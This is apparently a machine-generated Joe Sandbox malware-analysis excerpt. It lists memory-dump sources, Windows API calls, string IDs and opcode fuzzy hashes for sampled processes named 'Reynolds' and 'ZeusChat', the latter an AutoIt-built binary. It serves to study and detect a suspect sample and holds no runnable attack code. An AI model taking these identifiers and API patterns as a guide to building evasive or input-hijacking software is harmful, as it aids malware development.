• Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Combobox
• API String ID: 1025951953-2096851135
• Opcode ID: 419ce087720c7b5737b5b73e28fc957c16fa632f6a553db8683be6f9ef87a6ec
• Instruction ID: b9efc4be35e4648c4068cfdd0af6d33aca6019f51a1c9c04c063d969755d9dc5
• Opcode Fuzzy Hash: 419ce087720c7b5737b5b73e28fc957c16fa632f6a553db8683be6f9ef87a6ec
• Instruction Fuzzy Hash: A9311A326097C1DAE7709F24F440B5AB7A1F7857A0F504235EAA843BA9CB3CD846CF10

APIs
Strings
Memory Dump Source
• Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
• Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
• Opcode ID: 5492c754c9bff498288acdc113c590e82b98b645c49f858c44027990a109cd19
• Instruction ID: a227f4aa98395d446f3ec2635f6b8c60a7e082ed572ffc175ebf7d2b2da56c75
• Opcode Fuzzy Hash: 5492c754c9bff498288acdc113c590e82b98b645c49f858c44027990a109cd19
• Instruction Fuzzy Hash: 3E314932A097C1CAE760DB15F44475AB7B1F7887A0F544235EAAC43BA8CB3CD846CB11

APIs
Strings
Memory Dump Source
• Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
• Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
• API ID: _handle_error
• String ID: "$pow
• API String ID: 1757819995-713443511
• Opcode ID: 2a5c1d25bf9eaccf3d95b4360943358a5a34a98ae302652ad79e849c14545523
• Instruction ID: bb34f39ccfcd12d48735ab265202fb29df1d803cc284044f193c391dc5e8f2ab
• Opcode Fuzzy Hash: 2a5c1d25bf9eaccf3d95b4360943358a5a34a98ae302652ad79e849c14545523
• Instruction Fuzzy Hash: 7D213A72D1DB88D6E361DF10F040A6AAAB0FBDA344F611325F68906968DBBDD0569F10

APIs
Strings
Memory Dump Source
• Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
• Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
• API ID: CloseCreateHandleProcess
• String ID:
• API String ID: 3712363035-3916222277
• Opcode ID: cc2544113331effc305b0a03fe3b3a35c1ebbb01cab2a7be9a8f7d8f60356f9c
• Instruction ID: a1bf9eba12b578158ae63eb5b5ebd678245248de8782de50a9c84705463f7d7e
• Opcode Fuzzy Hash: cc2544113331effc305b0a03fe3b3a35c1ebbb01cab2a7be9a8f7d8f60356f9c
• Instruction Fuzzy Hash: BE114C31A09641E6F721AF12F90026AF6B1FB94784F8A4179EA4D47A74CF3DD052CB10
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                      • String ID: !$tan
                                                                                                      • API String ID: 3384550415-2428968949
                                                                                                      • Opcode ID: 353651fcbdf869610a9aa7174845b6b37f2108fed80d9f7b1c03092e70d52472
                                                                                                      • Instruction ID: b218096e853c8b7888bf9889e8bb9e05eb3ffb6138cd331790fe83e466453446
                                                                                                      • Opcode Fuzzy Hash: 353651fcbdf869610a9aa7174845b6b37f2108fed80d9f7b1c03092e70d52472
                                                                                                      • Instruction Fuzzy Hash: 0101D632E19B8491EA55DF12F40037AA1A1BF9A7D4F904334E94D07B98EF3CD1518B10
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                      • String ID: !$cos
                                                                                                      • API String ID: 3384550415-1949035351
                                                                                                      • Opcode ID: a332118c418a9a5553ba94b25f2e8775fa0e5e0d6883273b594770b1dd192514
                                                                                                      • Instruction ID: 4a729fdee59f27c041cab60f3bb270518b79e25593be5303fa7a694faefd36a4
                                                                                                      • Opcode Fuzzy Hash: a332118c418a9a5553ba94b25f2e8775fa0e5e0d6883273b594770b1dd192514
                                                                                                      • Instruction Fuzzy Hash: AC012832E19B84D1EA55DF12E400376A171BF9A7D4F904334E94D06BD8EF3CD0524B00
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                      • String ID: !$sin
                                                                                                      • API String ID: 3384550415-1565623160
                                                                                                      • Opcode ID: baa30cb22590ecb22bb061425c7c6612d2a3b082cca11217b3942b55bf4d3348
                                                                                                      • Instruction ID: bb097ce1735571ebbd0597b992c3b3987c6c870c59636c3a3f185afcddb6b0c3
                                                                                                      • Opcode Fuzzy Hash: baa30cb22590ecb22bb061425c7c6612d2a3b082cca11217b3942b55bf4d3348
                                                                                                      • Instruction Fuzzy Hash: BD01D872E19B8991EA55DF12E40037AA171BF9A7D4F904334E95D06B98EF7CD1524B00
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _handle_error
                                                                                                      • String ID: "$exp
                                                                                                      • API String ID: 1757819995-2878093337
                                                                                                      • Opcode ID: ca465fa898a567bf7fb695c7da4f831c21791187771085b507e6f3573d05dac5
                                                                                                      • Instruction ID: 5a1b5ddfa4f80b79d120dc366b35b192ed038cd8fedeb5877df3fef51f591f0f
                                                                                                      • Opcode Fuzzy Hash: ca465fa898a567bf7fb695c7da4f831c21791187771085b507e6f3573d05dac5
                                                                                                      • Instruction Fuzzy Hash: BD01A536D29B88D2F621DF24E0492AABA71FFEA704F605315E7441A674CB7DD4829B10
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: fprintf
                                                                                                      • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                      • API String ID: 383729395-3474627141
                                                                                                      • Opcode ID: 02ecdfc01483df5ad920e5d3ab05c7be711505ea062df89013f80c4b4e6c90cd
                                                                                                      • Instruction ID: 93803c870f5d702464c24fbb431809e0f429c8f3b561eefbb82ae16e5a8f2826
                                                                                                      • Opcode Fuzzy Hash: 02ecdfc01483df5ad920e5d3ab05c7be711505ea062df89013f80c4b4e6c90cd
                                                                                                      • Instruction Fuzzy Hash: E9F0F613604EA483E222AF64A9492ED6770E7593C1F409255DFCE63653DF19D4C2C300
                                                                                                      APIs
                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7AA117479
                                                                                                      • TlsSetValue.KERNEL32(?,?,?,00007FF7AA1170D1,?,?,?,?,00007FF7AA11649C,?,?,?,?,00007FF7AA114B1B), ref: 00007FF7AA117490
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Valuetry_get_function
                                                                                                      • String ID: FlsSetValue
                                                                                                      • API String ID: 738293619-3750699315
                                                                                                      • Opcode ID: f78dc03a8b7e459b2f5a523a33989f4a04428b56cdb294ea6966631ac146a953
                                                                                                      • Instruction ID: 6242ab320b6d995683fca86746e5527b6c3e66b256034ea5605e8c71405956bd
                                                                                                      • Opcode Fuzzy Hash: f78dc03a8b7e459b2f5a523a33989f4a04428b56cdb294ea6966631ac146a953
                                                                                                      • Instruction Fuzzy Hash: CFE0E5B1A0A642F1FA167B40F4000F9E2B1AF48790FDA40B5D51D063B2EE3CD496C730
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strerrorstrlen
                                                                                                      • String ID: (null)
                                                                                                      • API String ID: 960536887-3941151225
                                                                                                      • Opcode ID: 7172875ce593b75b5341076a1c63307b3f224e7aacb88239cda03de814cec602
                                                                                                      • Instruction ID: 74ddcf753ca26a8a200a9b884ed4d1b5e7d8b817dbc39c000657ae254ae32e4d
                                                                                                      • Opcode Fuzzy Hash: 7172875ce593b75b5341076a1c63307b3f224e7aacb88239cda03de814cec602
                                                                                                      • Instruction Fuzzy Hash: 7AE0BF27306E7087F946AFA1941D3EE6D916F847C0F6840A56DCB0668BEE29D4C05691
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strerrorstrlen
                                                                                                      • String ID: (null)
                                                                                                      • API String ID: 960536887-3941151225
                                                                                                      • Opcode ID: 8f9d73ed0f7f808f8cf2d3c42a058803114a596263f7b0412af6d2630ff1c4ef
                                                                                                      • Instruction ID: cb7d8ad1b8cf07797dcf5fceaea51ed2406881317f46a351e21c44ef2f7e80f5
                                                                                                      • Opcode Fuzzy Hash: 8f9d73ed0f7f808f8cf2d3c42a058803114a596263f7b0412af6d2630ff1c4ef
                                                                                                      • Instruction Fuzzy Hash: 68E0EC13714E7083FA07AFA094293AE2DA16FC63C0F64449A7DCB4269BDE3DD4C2A591
                                                                                                      APIs
                                                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7AA115471
                                                                                                      • _CxxThrowException.LIBVCRUNTIME ref: 00007FF7AA115482
                                                                                                        • Part of subcall function 00007FF7AA116EA8: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7AA115487), ref: 00007FF7AA116F1D
                                                                                                        • Part of subcall function 00007FF7AA116EA8: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7AA115487), ref: 00007FF7AA116F4F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                                                      • String ID: Unknown exception
                                                                                                      • API String ID: 3561508498-410509341
                                                                                                      • Opcode ID: badd8b7e3d07d99b52e3bffc87efa81072822f9ce37558ce68a18c88b8dc1f94
                                                                                                      • Instruction ID: 6874bcdeee752b78f6ba47fa5a8117a589e90cb222ad3675a96ec9ec6827f111
                                                                                                      • Opcode Fuzzy Hash: badd8b7e3d07d99b52e3bffc87efa81072822f9ce37558ce68a18c88b8dc1f94
                                                                                                      • Instruction Fuzzy Hash: F7D0122261AA46E1EF11FB00E4807A9E330F780318FD54475D14D41571DF2DD547C310
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 682475483-0
APIs
Strings
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
• String ID: Shell_TrayWnd
• API String ID: 3778422247-2988720461
APIs
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
• String ID:
• API String ID: 3372153169-0
APIs
Strings
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
Strings
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID:
• String ID: P
• API String ID: 0-3110715001
APIs
Strings
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
• String ID: -$:$:$?
• API String ID: 3440502458-92861585
APIs
  • Part of subcall function 00007FF752002794: GetWindowLongPtrW.USER32(?,?,00000000,00007FF75204A57D), ref: 00007FF7520027B1
• DefDlgProcW.USER32(?,?,?,?,?,?,?,?,?,00007FF7520024CF), ref: 00007FF7520025EA
• GetSysColor.USER32(?,?,?,?,?,?,?,?,?,00007FF7520024CF), ref: 00007FF7520026F8
• SetBkColor.GDI32(?,?,?,?,?,?,?,?,?,00007FF7520024CF), ref: 00007FF75200270D
• DefDlgProcW.USER32(?,?,?,?,?,?,?,?,?,00007FF7520024CF), ref: 00007FF752002786
Strings
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: ColorProc$LongWindow
• String ID: +
• API String ID: 3744519093-2126386893
Strings
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID:
• String ID: NULL Pointer assignment$Not an Object type
• API String ID: 0-572801152
APIs
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
APIs
Strings
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: _handle_error
• String ID: !$VUUU$fmod
• API String ID: 1757819995-2579133210
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF752042BF0
  • Part of subcall function 00007FF75203AF34: GetCurrentProcess.KERNEL32(00007FF75203B0A5), ref: 00007FF75203AF61
Strings
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
• Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
Similarity
• API ID: CurrentProcess_invalid_parameter_noinfo
• String ID: *$.$.
• API String ID: 2518042432-2112782162
• Opcode ID: 4bc727eecd12c05f0579dc3a47633661258e4e13a894efe955ef075ebd1ec7be
• Instruction ID: 347369b8580d68201e2f631ae67eaaf1dc4ff0f4113fd67a7e10be442b91a7c3
• Opcode Fuzzy Hash: 4bc727eecd12c05f0579dc3a47633661258e4e13a894efe955ef075ebd1ec7be
• Instruction Fuzzy Hash: 63510662F16A5589FB10EFA19D002BDA3A0BF54BC8F988536CE0D17B84DEBCD04AC350
APIs
• GetSysColor.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7520B198A,?,?,?,00007FF75204A2A5), ref: 00007FF7520AF128
• SetTextColor.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7520B198A,?,?,?,00007FF75204A2A5), ref: 00007FF7520AF133
• GetSysColorBrush.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7520B198A,?,?,?,00007FF75204A2A5), ref: 00007FF7520AF14C
• GetSysColor.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7520B198A,?,?,?,00007FF75204A2A5), ref: 00007FF7520AF15E
• SetBkColor.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7520B198A,?,?,?,00007FF75204A2A5), ref: 00007FF7520AF17F
• SelectObject.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7520B198A,?,?,?,00007FF75204A2A5), ref: 00007FF7520AF18E
• InflateRect.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7520B198A,?,?,?,00007FF75204A2A5), ref: 00007FF7520AF1B3
• GetSysColor.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7520B198A,?,?,?,00007FF75204A2A5), ref: 00007FF7520AF1BE
• CreateSolidBrush.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7520B198A,?,?,?,00007FF75204A2A5), ref: 00007FF7520AF1C6
• FrameRect.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7520B198A,?,?,?,00007FF75204A2A5), ref: 00007FF7520AF1D9
• DeleteObject.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7520B198A,?,?,?,00007FF75204A2A5), ref: 00007FF7520AF1E2
• InflateRect.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7520B198A,?,?,?,00007FF75204A2A5), ref: 00007FF7520AF237
• FillRect.USER32(?,?,?,?,?,00000000), ref: 00007FF7520AF267
• GetWindowLongW.USER32(?,?,?,?,?,00000000), ref: 00007FF7520AF286
• SendMessageW.USER32(?,?,?,?,?,00000000), ref: 00007FF7520AF2D3
  • Part of subcall function 00007FF7520AF418: GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF45F
  • Part of subcall function 00007FF7520AF418: SetTextColor.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF46A
  • Part of subcall function 00007FF7520AF418: GetSysColorBrush.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF485
  • Part of subcall function 00007FF7520AF418: GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF498
  • Part of subcall function 00007FF7520AF418: GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF4C3
  • Part of subcall function 00007FF7520AF418: CreatePen.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7520AF0F0), ref: 00007FF7520AF4DA
